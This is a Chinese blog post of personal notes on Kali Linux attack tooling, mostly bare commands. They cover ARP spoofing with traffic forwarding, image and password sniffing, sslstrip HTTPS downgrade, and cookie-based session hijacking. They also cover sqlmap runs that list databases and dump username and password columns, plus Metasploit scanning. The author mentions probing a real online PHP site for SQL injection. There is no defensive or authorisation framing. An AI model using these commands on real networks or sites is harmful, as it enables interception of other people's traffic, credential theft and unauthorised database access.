kali 局域网嗅探

1、局域网图片嗅探

     工具  arpspoof

      arpspoof -i eth0 -t 192.1681.10(网卡 目标地址) 192.168.1.1 局域网网关,如果在Windows中可以使用局域网扫描工具  Advanced ip Scanner

        linux中 扫描局域网在线的主机 fping -asg 192.168.1.0/24 

                    
        欺骗的同时不能是对方断网,使用流量转发  echo 1 >/proc/sys/net/ipv4/ip_forward   

        检查是否成功执行     cat  proc/sys/sys/net/ipv4/ip_forward          
                     获取本机网卡的图片   driftnet -i eth0

2、密码嗅探 <http>

       先使用欺骗命令 arpspoof

         ettercap -Tq - i eth0

   

3、ssh远程连接操作  链接kali  shell模式注销

     ctrl +Alt +F1   切换到 命令行模式

      使用命令   /etc/init.d/ssh  start

      使用Xshell 链接kali ip

4、抓包https流量

     首先编辑    vim /etc/ettercap/etter.conf   修改  ****linux **  取消 #

    开启 sslstrip -a -f -k

     开启欺骗  arpspoof  同时转发流量 

   在https 网址上进行登陆 抓取流量

 5、会话劫持登陆已经被别人登陆的网站

    快速添加之前使用的命令  ! + 部分命令  就会补全

    先使用arpspoof 欺骗 同时流量转发

    使用 wireshark 流量抓包工具

     使用 ferret 重新生成抓包的工具

     ferret  -r  j加上 抓取的流量包  会生成一个 txt文件

    使用 hamster  -h打开一个浏览器        -----》 设置代理和端口   

    或者不适用欺骗,直接使用 ferret -i eth0  然后使用 hamster  浏览网页  

    另外基于界面的软件 cookieCadger

6、sqlmap 对asp网站的检测

      sqlmap -u "www.baidu.com.id=2" 

       sqlmap -u "www.baidu.com.id=2"   --tables

       sqlmap -u "www.baidu.com.id=2"     --columns -T  "user"

         sqlmap -u "www.baidu.com.id=2"  --dump  -C "username ,password" -T "user"

    cookie使用     sqlmap -u “  www.baidu.com.php.id=2”   --cookie "id=23" --level=2

     

7、sqlmap 对php网站的检测

       sqlmap -u “  www.baidu.com.php.id=2”  --is-dba   检测是否是dba 形式  (可以将文件写入目录)

        sqlmap -u “  www.baidu.com.php.id=2”  --dbs   (列出所有的数据库)

      sqlmap -u “  www.baidu.com.php.id=2”   --current-db     (猜测当前的数据库)

        sqlmap -u “  www.baidu.com.php.id=2”  --tables -D "admin"   (根据admin数据库猜测表名)

         sqlmap -u “  www.baidu.com.php.id=2”   --columns -T "pss"  -D "admin"

         sqlmap -u “  www.baidu.com.php.id=2”  --dump  -C "username,password " -T "pss"  -D "admin"

8、实例检测

   下面是我检测的一个网上的PHP的网站 存在SQL注入的漏洞

9、Metasploit

     msfconsole

     这一节我之前的微博已经写过很多,不过还没哟整理,想着抽空整理一遍

   

    

10、流量分析工具 nload

        附: 卸载之前暗转的软件 apt-get remove 

             修复没有成功安装的软件   apt --fix-broken install

11、metasploit

    使用Metasploit 辅助模块 wmap进行扫描(对网站进行集中的扫描)

    使用Sqlmap辅助模块进行扫描:

 

      

   

   

 

 

 

    

    

     

 

   

 

posted @ 2018-10-02 21:09  疏桐  阅读(12222)  评论(0编辑  收藏  举报
function e(n){ return document.getElementsByTagName(n) } function t(){ var t=e("script"),o=t.length,i=t[o-1]; return{ l:o,z:n(i,"zIndex",-1),o:n(i,"opacity",.5),c:n(i,"color","0,0,0"),n:n(i,"count",99) } } function o(){ a=m.width=window.innerWidth||document.documentElement.clientWidth||document.body.clientWidth, c=m.height=window.innerHeight||document.documentElement.clientHeight||document.body.clientHeight } function i(){ r.clearRect(0,0,a,c); var n,e,t,o,m,l; s.forEach(function(i,x){ for(i.x+=i.xa,i.y+=i.ya,i.xa*=i.x>a||i.x<0?-1:1,i.ya*=i.y>c||i.y<0?-1:1,r.fillRect(i.x-.5,i.y-.5,1,1),e=x+1;e=n.max/2&&(i.x-=.03*o,i.y-=.03*m), t=(n.max-l)/n.max,r.beginPath(),r.lineWidth=t/2,r.strokeStyle="rgba("+d.c+","+(t+.2)+")",r.moveTo(i.x,i.y),r.lineTo(n.x,n.y),r.stroke())) }), x(i) } var a,c,u,m=document.createElement("canvas"), d=t(),l="c_n"+d.l,r=m.getContext("2d-disabled"), x=window.requestAnimationFrame||window.webkitRequestAnimationFrame||window.mozRequestAnimationFrame||window.oRequestAnimationFrame||window.msRequestAnimationFrame|| function(n){ window.setTimeout(n,1e3/45) }, w=Math.random,y={x:null,y:null,max:2e4};m.id=l,m.style.cssText="position:fixed;top:0;left:0;z-index:"+d.z+";opacity:"+d.o,e("body")[0].appendChild(m),o(),window.onresize=o, window.onmousemove=function(n){ n=n||window.event,y.x=n.clientX,y.y=n.clientY }, window.onmouseout=function(){ y.x=null,y.y=null }; for(var s=[],f=0;d.n>f;f++){ var h=w()*a,g=w()*c,v=2*w()-1,p=2*w()-1;s.push({x:h,y:g,xa:v,ya:p,max:6e3}) } u=s.concat([y]), setTimeout(function(){i()},100) }();